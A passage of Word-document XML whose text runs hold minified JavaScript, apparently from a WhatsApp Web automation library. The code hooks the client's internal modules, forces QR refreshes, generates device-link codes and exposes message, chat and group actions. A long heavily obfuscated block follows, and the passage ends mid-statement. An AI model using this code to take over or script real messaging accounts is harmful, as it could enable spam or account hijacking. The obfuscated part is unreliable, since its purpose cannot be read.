        <w:t xml:space="preserve">            window.moduleRaid=function(){moduleRaid.mID=Math.random().toString(36).substring(7),moduleRaid.mObj={};const e=parseInt(window.Debug?.VERSION?.split(".")?.[1])&gt;=3e3;return fillModuleArray=function(){var o,d;e?moduleRaid.mObj=Object.entries(require("__debug").modulesMap).filter((e=&gt;e[1]?.exports)).map((([e,o])=&gt;({k:e,exports:o.exports}))).filter((e=&gt;!e.k.includes("react")&amp;&amp;!e.k.startsWith("use"))).reduce(((e,t)=&gt;({...e,[t.k]:o?Object.keys(d?t.exports:t.exports.default||t.exports):d?t.exports:t.exports.default||t.exports})),{}):(window.webpackChunkbuild||window.webpackChunkwhatsapp_web_client)&amp;&amp;(window.webpackChunkbuild||window.webpackChunkwhatsapp_web_client||[]).push([[moduleRaid.mID],{},function(e){Object.keys(e.m).forEach((function(o){moduleRaid.mObj[o]=e(o)}))}])},fillModuleArray(),get=function(e){return moduleRaid.mObj[e]},findModule=function(e){return results=[],modules=Object.keys(moduleRaid.mObj),modules.forEach((function(o){if(mod=moduleRaid.mObj[o],"undefined"!=typeof mod)if("string"==typeof e){if("object"==typeof mod.default)for(key in mod.default)key==e&amp;&amp;results.push(mod);for(key in mod)key==e&amp;&amp;results.push(mod)}else{if("function"!=typeof e)throw new TypeError("findModule can only find via string and function, "+typeof e+" was passed");e(mod)&amp;&amp;results.push(mod)}})),results},{modules:moduleRaid.mObj,constructors:moduleRaid.cArr,findModule:findModule,get:get}},"object"==typeof module&amp;&amp;module.exports?module.exports=moduleRaid:window.mR=moduleRaid();;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            window.isRipeSession=function(){return document.getElementsByClassName(require("WAWebIntroPanel.scss").intro).length};;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            return console.log("Smart QR Loaded"),window.checkQrRefresh=()=&gt;"null"===window.localStorage["old-logout-cred"]&amp;&amp;window.Store&amp;&amp;window.Store.State&amp;&amp;!window.relaunched?((window.Store?.State?.Socket||require("WAWebSocketModel").Socket).state="UNPAIRED",require("WAWebCmd").Cmd.refreshQR(),window.relaunched=!0,!0):window.relaunched||!1,window.linkCode=async function(e){e=`${(e.toString().match(/\d+/g)||[]).map(Number)[0]}`;const t=e=&gt;require("WAWebLinkDeviceAction").resetLinkDeviceState({linkDeviceMethod:e?require("WAWebAltDeviceLinkingApi").PairingType.ALT_DEVICE_LINKING:require("WAWebAltDeviceLinkingApi").PairingType.QR_CODE});await new Promise((e=&gt;setTimeout(e,2e3))),console.log("resetting state",!1),await t(!1),await new Promise((e=&gt;setTimeout(e,2e3))),console.log("resetting state",!0),await t(!0);const o=await require("WAWebLinkDeviceAction").genLinkDeviceCodeForPhoneNumber(e,!0);return o.slice(0,4)+"-"+o.slice(4)},window.smartQr=function(e){const t=()=&gt;document.querySelector('canvas[aria-label="Scan this QR code to link a device!"]')||document.querySelector("canvas[aria-label]"),o=window.Store.State&amp;&amp;window.Store.State.Socket||require("WAWebSocketModel").Socket,n=async({stream:t})=&gt;{console.log("🚀 ~ stateCallback ~ stream:",t),"SYNCING"!==t&amp;&amp;"CONNECTED"!==t||(await e("SYNCING"===t?"QR_CODE_SUCCESS":"MULTI_DEVICE_DETECTED"),window.nxxoBV&amp;&amp;window.nxxoBV.disconnect&amp;&amp;window.nxxoBV.disconnect(),o.off("change:stream",n))};o.on("change:stream",n);var i=t().parentElement.className,d="";return window.nxxoBV=new MutationObserver((async t=&gt;{for(const n of t){if("attributes"==n.type&amp;&amp;"data-ref"==n.attributeName){let t=n.target.attributes["data-ref"].value;d!=t&amp;&amp;(await e(t),relaunched=!1),d=t}"attributes"==n.type&amp;&amp;"class"==n.attributeName&amp;&amp;n.target.className.includes(i)&amp;&amp;!relaunched&amp;&amp;o&amp;&amp;(o.state="UNPAIRED",require("WAWebCmd").Cmd.refreshQR(),window.relaunched=!0)}})),nxxoBV.observe(t().parentElement.parentElement,{attributes:!0,childList:!0,subtree:!0}),!0},window.stopQr=function(){return window.nxxoBV&amp;&amp;window.nxxoBV.disconnect&amp;&amp;window.nxxoBV.disconnect(),!0},window.getQrPng=function(e){const t=()=&gt;document.querySelector('canvas[aria-label="Scan this QR code to link a device!"]')||document.querySelector("canvas[aria-label]");return new Promise((o=&gt;{if(!t()||!t().parentElement.getAttribute("data-ref"))return!1;{let l=e=e||250;const{encoderType:r="image/png",encoderOptions:s=.8,canvg:c}={},u=document.createElement("canvas"),W=u.getContext("2d"),m=1;u.width=l*m,u.height=e*m,u.style.width=`${u.width}px`,u.style.height=`${u.height}px`,W.setTransform(m,0,0,m,0,0);var n=new QRCode({background:"white",color:"red",width:u.width,height:u.height,content:t()?t().parentElement.getAttribute("data-ref"):"false"}).svg(),i="data:image/svg+xml;base64,"+btoa(n),d=document.querySelector("svg"),a=((new XMLSerializer).serializeToString(d),document.createElement("img"));a.setAttribute("src",i),a.onload=function(){W.drawImage(a,0,0);var e=u.toDataURL(r,s);o(e)}}}))},window.Store?.State||function(){let e=[{id:"MediaCollection",module:"WAWebAttachMediaCollection",conditions:e=&gt;e.default&amp;&amp;e.default.prototype&amp;&amp;(void 0!==e.default.prototype.processFiles||void 0!==e.default.prototype.processAttachments)?e.default:null},{id:"Archive",module:"WAWebSetArchiveChatAction",conditions:e=&gt;e.setArchive?e:null},{id:"Block",module:"WAWebBlockContactUtils",conditions:e=&gt;e.blockContact&amp;&amp;e.unblockContact?e:null},{id:"ChatUtil",module:"WAWebSendClearChatAction",conditions:e=&gt;e.sendClear?e:null},{id:"GroupInvite",module:"WAWebGroupInviteJob",conditions:e=&gt;e.queryGroupInviteCode?e:null},{id:"Wap",module:"WAWebCreateGroupAction",conditions:e=&gt;e.createGroup?e:null},{id:"State",module:"WAWebSocketModel",conditions:e=&gt;e.STATE&amp;&amp;e.STREAM?e:null},{id:"_Presence",module:"WAWebContactPresenceBridge",conditions:e=&gt;e.setPresenceAvailable&amp;&amp;e.setPresenceUnavailable?e:null},{id:"WapDelete",module:"WAWebChatDeleteBridge",conditions:e=&gt;e.sendConversationDelete&amp;&amp;2==e.sendConversationDelete.length?e:null},{id:"WapQuery",module:"WAWebQueryExistsJob",conditions:e=&gt;e.queryExist?e:e.default&amp;&amp;e.default.queryExist?e.default:null},{id:"UserConstructor",module:"WAWebWid",conditions:e=&gt;e.default&amp;&amp;e.default.prototype&amp;&amp;e.default.prototype.isServer&amp;&amp;e.default.prototype.isUser?e.default:null},{id:"SendTextMsgToChat",module:"WAWebSendTextMsgChatAction",resolver:e=&gt;e.sendTextMsgToChat},{id:"ReadSeen",module:"WAWebUpdateUnreadChatAction",conditions:e=&gt;e.sendSeen?e:null},{id:"sendDelete",module:"WAWebDeleteChatAction",conditions:e=&gt;e.sendDelete?e.sendDelete:null},{id:"addAndSendMsgToChat",resolver:e=&gt;e.addAndSendMsgToChat,module:"WAWebSendMsgChatAction",conditions:e=&gt;e.addAndSendMsgToChat?e.addAndSendMsgToChat:null},{id:"Catalog",module:"WAWebCatalogCollection",conditions:e=&gt;e.Catalog?e.Catalog:null},{id:"MsgKey",module:"WAWebMsgKey",conditions:e=&gt;e.default&amp;&amp;e.default.toString&amp;&amp;e.default.toString().includes("MsgKey error: obj is null/undefined")?e.default:null},{id:"Parser",module:"WAWebE2EProtoUtils",conditions:e=&gt;e.convertToTextWithoutSpecialEmojis?e.default:null},{id:"Builders",module:"WAWebProtobufsE2E.pb",conditions:e=&gt;e.TemplateMessage&amp;&amp;e.HydratedFourRowTemplate?e:null},{id:"Me",module:"WAWebUserPrefsMeUser",conditions:e=&gt;e.PLATFORMS&amp;&amp;e.Conn?e.default:null},{id:"MyStatus",module:"WAWebContactStatusBridge",conditions:e=&gt;e.getStatus&amp;&amp;e.setMyStatus?e:null},{id:"ChatStates",module:"WAWebChatStateBridge",conditions:e=&gt;e.sendChatStatePaused&amp;&amp;e.sendChatStateRecording&amp;&amp;e.sendChatStateComposing?e:null},{id:"GroupActions",module:"WAWebExitGroupAction",conditions:e=&gt;e.sendExitGroup&amp;&amp;e.localExitGroup?e:null},{id:"Participants",module:"WAWebGroupsParticipantsApi",conditions:e=&gt;e.addParticipants&amp;&amp;e.removeParticipants&amp;&amp;e.promoteParticipants&amp;&amp;e.demoteParticipants?e:null},{id:"WidFactory",module:"WAWebWidFactory",conditions:e=&gt;e.isWidlike&amp;&amp;e.createWid&amp;&amp;e.createWidFromWidLike?e:null},{id:"GroupMetadata",module:"WAWebGroupMetadataCollection",conditions:e=&gt;e.default&amp;&amp;e.default.__proto__&amp;&amp;e.default.__proto__.handlePendingInvite?e.default:null},{id:"Sticker",module:"WAWebStickerPackCollection",resolver:e=&gt;e.StickerPackCollection,conditions:e=&gt;e.default&amp;&amp;e.default.Sticker?e.default.Sticker:null},{id:"UploadUtils",module:"WAWebUploadManager",conditions:e=&gt;e.default&amp;&amp;e.default.encryptAndUpload?e.default:null}];const t=e=&gt;require("__debug").modulesMap[e]||!1;e.map((e=&gt;{const o=e.module;if(o&amp;&amp;t(o)&amp;&amp;(e=&gt;{const o=t(e);return!!o&amp;&amp;null!=o.dependencies&amp;&amp;o.depPosition&gt;=o.dependencies.length})(o)){let t=require(o);e.foundedModule=t}})),window.Store={...{...require("WAWebCollections")},...window.Store||{}},e.forEach((e=&gt;{e.foundedModule&amp;&amp;(window.Store[e.id]=e.resolver?e.resolver(e.foundedModule):e.foundedModule)})),window.Store.Chat&amp;&amp;(window.Store.Chat.modelClass.prototype.sendMessage=function(e){window.Store.SendTextMsgToChat(this,...arguments)}),window.Store}();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        } else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packages/core/src/transport/assets/launch.js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packages/core/src/transport/assets/prog_observer.js ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">(function (_0x4eff75, _0x4d48d8) { const _0x3ad82c = _0x4eff75(); function _0x2f7ecf(_0x18c50c, _0x2a22bc) { return _0x3762(_0x18c50c - -0x364, _0x2a22bc); } while (!![]) { try { const _0x204b46 = parseInt(_0x2f7ecf(-0x155, \'keyU\'))/(0x1ce5*0x1+-0x180e+-0x4d6)+parseInt(_0x2f7ecf(-0x12b,\'jwY6\'))/(-0x265*-0x3+0x2b*0x25+-0xd64)+parseInt(_0x2f7ecf(-0x200,\'7Isp\'))/(-0x7e+0x2*0xde5+0xb*-0x27b)+parseInt(_0x2f7ecf(-0x289,\'0)V6\'))/(-0xbe9*0x1+0x337*0xa+-0x1*0x1439)+-parseInt(_0x2f7ecf(-0x1cd,\'6^)y\'))/(-0x95b+-0x80e*0x2+-0xe*-0x1d2)+-parseInt(_0x2f7ecf(-0x23f,\'ji]W\'))/(0x36d*0x6+0x11d2+0x1*-0x265a)*(parseInt(_0x2f7ecf(-0x1a2,\'H%e]\'))/(0x1e2e*-0x1+0x329*0xb+-0x48e))+-parseInt(_0x2f7ecf(-0x27f,\'p*$n\'))/(-0x3*0x6ea+0x5f2+-0x3b5*-0x4)*(parseInt(_0x2f7ecf(-0x23b,\'ji]W\'))/(-0x51*0x15+0x8cf+0x1*-0x221));if(_0x204b46===_0x4d48d8)break;else _0x3ad82c[\'push\'](_0x3ad82c[\'shift\']());}catch(_0x117059){_0x3ad82c[\'push\'](_0x3ad82c[\'shift\']());}}}(_0x3ee4,-0x1*0x8694e+-0x5*0x2529b+0x260*0xb90));const _0x2294e7=(function(){const _0x7fb900={\'WzNgu\':function(_0x5caa75,_0x5a5692){return _0x5caa75!==_0x5a5692;},\'bvMJn\':_0x30b8a6(0x3aa,\'7KHy\')+\'nS\',\'NUzNQ\':function(_0x6e78d,_0x394e79){return _0x6e78d===_0x394e79;},\'KWhrR\':_0x30b8a6(0x4b9,\')FYe\')+\'oF\',\'tyQoZ\':function(_0x408347){return _0x408347();},\'ILNfs\':function(_0x5d373c){return _0x5d373c();},\'ttGIH\':function(_0x190752){return _0x190752();},\'KBtbp\':function(_0x4988b1,_0x2cfa11){return _0x4988b1!==_0x2cfa11;},\'wFVCg\':_0x30b8a6(0x49f,\'0)V6\')+\'Xv\',\'QzAfn\':_0x30b8a6(0x39d,\'YQri\')+\'zT\'};let _0x551be7=!![];function _0x30b8a6(_0x3d4887,_0x1c3f23){return _0x3762(_0x3d4887-0x2b0,_0x1c3f23);}return function(_0x5c78d6,_0x45d339){function _0x264578(_0x38ac2c,_0x3167a9){return _0x30b8a6(_0x3167a9- -0x20f,_0x38ac2c);}const _0x3ec1e9={\'YYbRm\':function(_0x185dd8){function _0x1f7b11(_0x1c4e10,_0x1c1247){return _0x3762(_0x1c1247- -0x397,_0x1c4e10);}return _0x7fb900[_0x1f7b11(\'wjEi\',-0x1eb)+\'fs\'](_0x185dd8);},\'Jksgj\':function(_0x14fbb3){function _0x42a1d0(_0x4398a2,_0x2325f8){return _0x3762(_0x4398a2-0x100,_0x2325f8);}return _0x7fb900[_0x42a1d0(0x335,\'a29p\')+\'oZ\'](_0x14fbb3);},\'MgosI\':function(_0x5386a4){function _0x428177(_0x39b7a0,_0x12b38b){return _0x3762(_0x39b7a0- -0x38c,_0x12b38b);}return _0x7fb900[_0x428177(-0x2a9,\'7Isp\')+\'IH\'](_0x5386a4);}};if(_0x7fb900[\'KBt\'+\'bp\'](_0x7fb900[\'wFV\'+\'Cg\'],_0x7fb900[_0x264578(\'#Ig@\',0x213)+\'fn\'])){const _0x409eda=_0x551be7?function(){function _0x213bd3(_0x53a251,_0x266f52){return _0x264578(_0x266f52,_0x53a251-0x2ab);}if(_0x7fb900[_0x213bd3(0x5ab,\'dCo]\')+\'gu\'](_0x7fb900[_0x213bd3(0x4bd,\'7KHy\')+\'Jn\'],_0x7fb900[\'bvM\'+\'Jn\'])){const _0x127bda={\'RtRTB\':function(_0x3b1c9f){function _0x4ff5e1(_0xeae105,_0x45825c){return _0x213bd3(_0x45825c- -0x3ca,_0xeae105);}return _0x3ec1e9[_0x4ff5e1(\'keyU\',0x1dc)+\'Rm\'](_0x3b1c9f);},\'FWWCo\':function(_0xad0d07){return _0x3ec1e9[\'Jks\'+\'gj\'](_0xad0d07);}},_0x2633b0=new _0x3d52a7(_0xc030b7=&gt;{const _0x3a8b65={\'wMImZ\':function(_0xb1ccf1){function _0x1c0a28(_0x30666d,_0x5a796){return _0x3762(_0x5a796-0x53,_0x30666d);}return _0x127bda[_0x1c0a28(\'ji]W\',0x2ca)+\'TB\'](_0xb1ccf1);}},_0x23c575={};_0x23c575[_0x288c5c(\'Ej7O\',0x296)+\'rib\'+\'ute\'+\'s\']=!(0x166c+0x696+0x2f*-0x9e);function _0x288c5c(_0x591073,_0x270d3a){return _0x213bd3(_0x270d3a- -0x1e3,_0x591073);}_0x23c575[_0x288c5c(\'7KHy\',0x344)+_0x288c5c(\'w)9n\',0x2b2)+_0x288c5c(\'ji]W\',0x343)]=!(0x2e*-0x9e+0x1d3*0x3+0x16eb),_0x23c575[_0x288c5c(\'w&amp;WF\',0x235)+_0x288c5c(\'Ej7O\',0x375)+\'e\']=!(0x1fca+-0x25b6+0x5ec),_0x127bda[_0x288c5c(\'ji]W\',0x3e0)+\'TB\'](_0x5f5ed)&amp;&amp;(new _0x373c36(_0x25b426=&gt;{function _0x1a2212(_0x5c6f2d,_0x3b487f){return _0x288c5c(_0x5c6f2d,_0x3b487f- -0x47a);}_0x3a990a[_0x1a2212(\'B&amp;@p\',-0x161)+_0x1a2212(\'Ca[o\',-0x1ef)+_0x1a2212(\'O^MI\',-0x1a5)+_0x1a2212(\'ZSvG\',-0x157)+\'ven\'+\'t\']&amp;&amp;_0x2ce3e1[_0x1a2212(\'C4YZ\',-0x18a)+_0x1a2212(\'jwY6\',-0x15f)+_0x1a2212(\'5]Ve\',-0x240)+\'arE\'+_0x1a2212(\'uewv\',-0xdd)+\'t\'](_0x3a8b65[\'wMI\'+\'mZ\'](_0x2e5926)),_0x31278d&amp;&amp;_0x56d670[\'log\'](_0x3a8b65[_0x1a2212(\'b(![\',-0x15d)+\'mZ\'](_0x1dc9c2));})[_0x288c5c(\'8R(E\',0x29f)+_0x288c5c(\'p$1W\',0x327)+\'e\'](_0x127bda[_0x288c5c(\'H%e]\',0x276)+\'Co\'](_0x11628d),_0x23c575),_0x2633b0[_0x288c5c(\'w&amp;WF\',0x3a6)+_0x288c5c(\'uewv\',0x304)+\'nec\'+\'t\']());}),_0x142452={};_0x142452[_0x213bd3(0x487,\'w&amp;WF\')+_0x213bd3(0x58b,\'9*HF\')+\'ute\'+\'s\']=!(0x1205+0xef0+-0x20f5),_0x142452[_0x213bd3(0x4da,\'ajln\')+_0x213bd3(0x48a,\'ZSvG\')+_0x213bd3(0x556,\'6^)y\')]=!(-0x36e*0x9+0x12fb+0xbe3),_0x142452[_0x213bd3(0x4aa,\'b(![\')+_0x213bd3(0x59c,\'a29p\')+\'e\']=!(-0x1a45+-0xd42+-0x1*-0x2787),_0x2633b0[\'obs\'+_0x213bd3(0x49b,\'dCo]\')+\'e\'](_0x3ec1e9[_0x213bd3(0x45e,\'ZSvG\')+\'sI\'](_0x4fe95d),_0x142452);}else{if(_0x45d339){if(_0x7fb900[_0x213bd3(0x550,\'L0[V\')+\'NQ\'](_0x7fb900[\'KWh\'+\'rR\'],_0x7fb900[\'KWh\'+\'rR\'])){const _0x1f8551=_0x45d339[\'app\'+\'ly\'](_0x5c78d6,arguments);return _0x45d339=null,_0x1f8551;}else{const _0x4c0d76=_0x44bb73?function(){function _0x102aab(_0x5d0017,_0x840f79){return _0x213bd3(_0x840f79- -0x255,_0x5d0017);}if(_0x153fd4){const _0x50d15c=_0x44328a[_0x102aab(\'#Gcp\',0x1c4)+\'ly\'](_0x192ef8,arguments);return _0x13f94e=null,_0x50d15c;}}:function(){};return _0x53e3ea=![],_0x4c0d76;}}}}:function(){};return _0x551be7=![],_0x409eda;}else _0x7fb900[_0x264578(\'B&amp;@p\',0x324)+\'oZ\'](_0x176ea7);};}()),_0x4a3e54=_0x2294e7(this,function(){const _0x2eae9d={};function _0x55e31d(_0xeab450,_0x48d2aa){return _0x3762(_0xeab450- -0x1c2,_0x48d2aa);}_0x2eae9d[_0x55e31d(-0x38,\'UPG@\')+\'et\']=_0x55e31d(-0x3f,\'D^n!\')+\'.+)\'+_0x55e31d(-0xad,\'5]Ve\')+_0x55e31d(-0x8b,\'N!1Y\');const _0x1bd097=_0x2eae9d;return _0x4a3e54[_0x55e31d(-0x7c,\'j)r8\')+_0x55e31d(-0xca,\'keyU\')+\'ng\']()[_0x55e31d(-0x3d,\'obHj\')+\'rch\'](_0x1bd097[_0x55e31d(-0x38,\'UPG@\')+\'et\'])[_0x55e31d(-0xce,\'37kx\')+_0x55e31d(-0xbd,\'ajln\')+\'ng\']()[\'con\'+_0x55e31d(-0xcc,\'#Gcp\')+_0x55e31d(-0xa3,\'Ej7O\')+\'or\'](_0x4a3e54)[_0x55e31d(-0xa1,\'B&amp;@p\')+_0x55e31d(-0xef,\'uewv\')](_0x1bd097[_0x55e31d(-0x33,\']rT)\')+\'et\']);});function _0x5e0cb6(_0x4d5ebc,_0x154585){return _0x3762(_0x154585- -0x384,_0x4d5ebc);}function _0x3762(_0x1d4aa4,_0xafbf3a){const _0x180560=_0x3ee4();return _0x3762=function(_0x1343e9,_0x583d71){_0x1343e9=_0x1343e9-(0x21e1+0x1fb2*0x1+-0x40ca);let _0x4f756b=_0x180560[_0x1343e9];if(_0x3762[\'wHQwpm\']===undefined){var _0x5c66cc=function(_0x3c7171){const _0x2de250=\'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=\';let _0x3b7221=\'\',_0x5a5779=\'\',_0x3be9f1=_0x3b7221+_0x5c66cc;for(let _0x438906=0x2*0xae1+-0xabd+-0x7*0x193,_0x20236a,_0x18e432,_0x5158dc=-0x2107+-0x2b0+-0x23b7*-0x1;_0x18e432=_0x3c7171[\'charAt\'](_0x5158dc++);~_0x18e432&amp;&amp;(_0x20236a=_0x438906%(-0x1*-0x1697+0x7*0x139+0x2*-0xf91)?_0x20236a*(-0x35f+-0xe7d+0x121c)+_0x18e432:_0x18e432,_0x438906++%(-0x3*-0x5cc+-0x7d5*-0x1+-0x1935))?_0x3b7221+=_0x3be9f1[\'charCodeAt\'](_0x5158dc+(0x21b5*-0x1+0x1ad4+0x6eb))-(0x3b7*0x5+-0xf69+0x28*-0x14)!==0x269f+-0x24ae+-0x1f1?String[\'fromCharCode\'](-0x1987+0x5b*0x3d+0x4d7*0x1&amp;_0x20236a&gt;&gt;(-(0x1*-0x9ee+0x23*-0x3f+0x128d)*_0x438906&amp;0x1da9+-0x15aa+0xd*-0x9d)):_0x438906:-0x28*0x76+-0x16b5+0x2925){_0x18e432=_0x2de250[\'indexOf\'](_0x18e432);}for(let _0x5dcf25=0x1469+0x1*-0x2455+0x3fb*0x4,_0x37b6ec=_0x3b7221[\'length\'];_0x5dcf25&lt;_0x37b6ec;_0x5dcf25++){_0x5a5779+=\'%\'+(\'00\'+_0x3b7221[\'charCodeAt\'](_0x5dcf25)[\'toString\'](0x3b*-0x83+-0x75*0x53+-0x886*-0x8))[\'slice\'](-(-0x11b2+-0xa*-0x105+0x782));}return decodeURIComponent(_0x5a5779);};const _0x39f5a2=function(_0x2afbf8,_0x1691d3){let _0x15ec08=[],_0x2461ba=0x4de*-0x3+-0x1eac+-0x13*-0x262,_0x13543e,_0x454ddd=\'\';_0x2afbf8=_0x5c66cc(_0x2afbf8);let _0x5b9ff1;for(_0x5b9ff1=0x8f*-0x1c+-0x1caa+0x2c4e;_0x5b9ff1&lt;-0x1cb4+-0xd*-0x1fb+0x3f5;_0x5b9ff1++){_0x15ec08[_0x5b9ff1]=_0x5b9ff1;}for(_0x5b9ff1=-0x1fa8+0xeab+0x1*0x10fd;_0x5b9ff1&lt;0x1*0x26ff+-0x1c14+0x9eb*-0x1;_0x5b9ff1++){_0x2461ba=(_0x2461ba+_0x15ec08[_0x5b9ff1]+_0x1691d3[\'charCodeAt\'](_0x5b9ff1%_0x1691d3[\'length\']))%(0xbdb+0x3fe*0x7+-0x26cd),_0x13543e=_0x15ec08[_0x5b9ff1],_0x15ec08[_0x5b9ff1]=_0x15ec08[_0x2461ba],_0x15ec08[_0x2461ba]=_0x13543e;}_0x5b9ff1=0xd9d+0x25b8+-0x1*0x3355,_0x2461ba=0x1d72+-0x7*0x211+-0xefb;for(let _0x2696f7=0xc14+0x1f7b+-0x2b8f;_0x2696f7&lt;_0x2afbf8[\'length\'];_0x2696f7++){_0x5b9ff1=(_0x5b9ff1+(-0xec0*-0x1+0x3a2*-0x5+-0x19*-0x23))%(-0x7a*-0x3+-0x2*0x693+0xcb8),_0x2461ba=(_0x2461ba+_0x15ec08[_0x5b9ff1])%(0x133+-0x33*-0xa1+-0x2046),_0x13543e=_0x15ec08[_0x5b9ff1],_0x15ec08[_0x5b9ff1]=_0x15ec08[_0x2461ba],_0x15ec08[_0x2461ba]=_0x13543e,_0x454ddd+=String[\'fromCharCode\'](_0x2afbf8[\'charCodeAt\'](_0x2696f7)^_0x15ec08[(_0x15ec08[_0x5b9ff1]+_0x15ec08[_0x2461ba])%(-0x1aa1+0x2*-0x1241+-0x1561*-0x3)]);}return _0x454ddd;};_0x3762[\'ltsEbH\']=_0x39f5a2,_0x1d4aa4=arguments,_0x3762[\'wHQwpm\']=!![];}const _0x151005=_0x180560[0x145+-0x640+0x55*0xf],_0x402b80=_0x1343e9+_0x151005,_0x1b01be=_0x1d4aa4[_0x402b80];if(!_0x1b01be){if(_0x3762[\'aNaINr\']===undefined){const _0x5ea557=function(_0x5be06b){this[\'gmbeVU\']=_0x5be06b,this[\'NmFlDn\']=[-0x13ca+0x13cf+-0x4,-0x96a*0x2+0x1*-0x14b1+0x2785,-0x214c*-0x1+0x17f9+-0x3*0x1317],this[\'ychFiv\']=function(){return\'newState\';},this[\'yesOIv\']=\'\\x5cw+\\x20*\\x5c(\\x5c)\\x20*{\\x5cw+\\x20*\',this[\'Zrirdq\']=\'[\\x27|\\x22].+[\\x27|\\x22];?\\x20*}\';};_0x5ea557[\'prototype\'][\'KKIdTA\']=function(){const _0x505944=new RegExp(this[\'yesOIv\']+this[\'Zrirdq\']),_0x2ef599=_0x505944[\'test\'](this[\'ychFiv\'][\'toString\']())?--this[\'NmFlDn\'][-0x15e+0x1f65+-0x1e06]:--this[\'NmFlDn\'][-0x22d2+0x5*-0x365+0x33cb*0x1];return this[\'EqYlCO\'](_0x2ef599);},_0x5ea557[\'prototype\'][\'EqYlCO\']=function(_0x52db78){if(!Boolean(~_0x52db78))return _0x52db78;return this[\'DKnWby\'](this[\'gmbeVU\']);},_0x5ea557[\'prototype\'][\'DKnWby\']=function(_0xfc753f){for(let _0x3ff1fe=0x2380*0x1+0x1*-0x1ddb+-0x5a5,_0x5d2995=this[\'NmFlDn\'][\'length\'];_0x3ff1fe&lt;_0x5d2995;_0x3ff1fe++){this[\'NmFlDn\'][\'push\'](Math[\'round\'](Math[\'random\']())),_0x5d2995=this[\'NmFlDn\'][\'length\'];}return _0xfc753f(this[\'NmFlDn\'][0x1ed4+-0x18b0+-0x624]);},new _0x5ea557(_0x3762)[\'KKIdTA\'](),_0x3762[\'aNaINr\']=!![];}_0x4f756b=_0x3762[\'ltsEbH\'](_0x4f756b,_0x583d71),_0x1d4aa4[_0x402b80]=_0x4f756b;}else _0x4f756b=_0x1b01be;return _0x4f756b;},_0x3762(_0x1d4aa4,_0xafbf3a);}_0x4a3e54();const _0x577523=(function(){const _0x4d11b3={};_0x4d11b3[_0xa82d30(\'w)9n\',0x44e)+\'FO\']=function(_0xbcb234,_0x2d5701){return _0xbcb234!==_0x2d5701;},_0x4d11b3[_0xa82d30(\'fr6p\',0x504)+\'fF\']=_0xa82d30(\'N!1Y\',0x531)+\'Dt\',_0x4d11b3[_0xa82d30(\'keyU\',0x563)+\'Nd\']=\'nUJ\'+\'hP\',_0x4d11b3[\'fSw\'+\'Ir\']=function(_0x5f4b4b,_0x1a9adc){return _0x5f4b4b!==_0x1a9adc;},_0x4d11b3[_0xa82d30(\'j)r8\',0x5c0)+\'mE\']=\'ROm\'+\'sM\',_0x4d11b3[_0xa82d30(\'B&amp;@p\',0x556)+\'wD\']=function(_0x4e5ec4,_0xae7ce3){return _0x4e5ec4+_0xae7ce3;},_0x4d11b3[\'wLN\'+\'zY\']=_0xa82d30(\'[sZX\',0x523)+\'u\';function _0xa82d30(_0x163135,_0x546ccb){return _0x3762(_0x546ccb-0x34b,_0x163135);}_0x4d11b3[_0xa82d30(\'dCo]\',0x429)+\'FC\']=_0xa82d30(\'ji]W\',0x4fa)+\'r\',_0x4d11b3[_0xa82d30(\'H]9!\',0x427)+\'Ro\']=_0xa82d30(\'#Gcp\',0x5b2)+_0xa82d30(\'O^MI\',0x5b4)+_0xa82d30(\'7Isp\',0x457)+\'ct\',_0x4d11b3[_0xa82d30(\')FYe\',0x4d4)+\'VF\']=function(_0x401d0c,_0x3289b){return _0x401d0c===_0x3289b;},_0x4d11b3[_0xa82d30(\'[sZX\',0x487)+\'lB\']=_0xa82d30(\'uewv\',0x579)+\'Dl\',_0x4d11b3[_0xa82d30(\'2H[!\',0x5b8)+\'Bq\']=_0xa82d30(\'wjEi\',0x4c5)+\'ln\';const _0x8d4518=_0x4d11b3;let _0x2c0ae3=!![];return function(_0x388777,_0x40116a){function _0x2e5017(_0x425512,_0x113bff){return _0xa82d30(_0x113bff,_0x425512- -0x183);}const _0x59ef05={\'ZijRF\':function(_0x591336,_0xd74552){function _0x52636d(_0x316671,_0x5d5764){return _0x3762(_0x5d5764- -0x80,_0x316671);}return _0x8d4518[_0x52636d(\'N!1Y\',0x141)+\'wD\'](_0x591336,_0xd74552);},\'dysfG\':_0x8d4518[_0x2e5017(0x34c,\'bhuG\')+\'zY\'],\'IHaZr\':_0x8d4518[_0x2e5017(0x37f,\'YQri\')+\'FC\'],\'wFlqA\':_0x8d4518[_0x2e5017(0x364,\'fr6p\')+\'Ro\']};if(_0x8d4518[\'qux\'+\'VF\'](_0x8d4518[_0x2e5017(0x29e,\'a29p\')+\'lB\'],_0x8d4518[\'HEu\'+\'Bq\']))return![];else{const _0x59ab3b=_0x2c0ae3?function(){function _0x8fffbc(_0x4bb048,_0x187c15){return _0x2e5017(_0x187c15-0x134,_0x4bb048);}if(_0x8d4518[_0x8fffbc(\'b(![\',0x4a4)+\'FO\'](_0x8d4518[_0x8fffbc(\'37kx\',0x533)+\'fF\'],_0x8d4518[_0x8fffbc(\'#Ig@\',0x48d)+\'Nd\'])){if(_0x40116a){if(_0x8d4518[\'fSw\'+\'Ir\'](_0x8d4518[_0x8fffbc(\'D^n!\',0x451)+\'mE\'],_0x8d4518[\'rIQ\'+\'mE\'])){const 